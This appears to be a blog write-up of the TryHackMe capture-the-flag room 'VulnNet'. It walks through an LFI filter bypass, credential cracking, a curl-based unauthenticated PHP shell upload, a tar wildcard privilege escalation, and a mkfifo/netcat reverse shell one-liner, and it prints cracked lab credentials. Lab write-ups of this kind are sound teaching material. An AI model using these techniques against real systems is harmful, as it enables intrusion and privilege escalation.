C R E A T E & D E S T R OY

VulnNet | TryHackMe

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial nmap results, let’s head to the web server…

In one of the Javascript files we find reference to http://broadcast.vulnnet.net so let’s add that to /etc/passwd and see what’s there.

We get thwacked with a basic authentication screen and it doesn’t seem so easy to bypass. Will return to the web server and see what else we can find first.


The other javascript file we can read has reference to an open PHP url, fuzzing with ffuf using an LFI list we find this endpoint is vulnerable to LFI. We just need a basic filter bypass (…//…//) and we can dump /etc/passwd.

The only user with a shell is server-management, there’s no ssh keys for the user we can grab. We can’t find accessible Apache access logs for poisoning, but we can check the .htpasswd file and see if we can get some users for the subdomain authentication…

We grab the username developers and the MD5 hash so let’s try and crack it.

There we go, developers:9972761drmfsls is our creds. Let’s try the login form we saw earlier.

Exploit DB gives us a situation where we can exploit a module for unauthenticated file upload, so we’ll try a PHP reverse shell…

curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" 'http://broadcast.vulnnet.thm/actions/beats_uploader.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Authorization: Basic ZGV2ZWxvcGVyczo5OTcyNzYxZHJtZnNscw==' 

The uploader renames files, but visiting http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR gives us a directory list anyway, so with that we can start up our listener and pop a shell!

We find a file in /var/backups/ssh-backup.tar.gz owner by the user server-management so we can copy to /tmp and extract it.
The SSH key requires a passphrase so we can run it through SSH2John and see if we can crack the hash…

With that we can kill our www-data shell and be comfortable in an SSH session.

We find a script owned by root backing up our Documents folder regularly. The tar backup command uses a wildcard so we can easily exploit this.

server-management@vulnnet:/tmp$ cat /var/opt/backupsrv.sh                                                                                  
# Where to backup to.                                                                                                                      
# What to backup.                                                                                                                          
cd /home/server-management/Documents                                                                                                       

Moving to our home directory we create the following files.

touch '--checkpoint=1'
touch '--checkpoint-action=exec=sh shell.sh'
and finally a quick mkfifo reverse shell in shell.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 1234 >/tmp/f

All that’s left to do is open another listener and wait for a call…

There’s our shell, and our root flag.

This was a nice room, with multiple not-too-complicated layers to getting a foothold.

Leave a Reply

Your email address will not be published. Required fields are marked *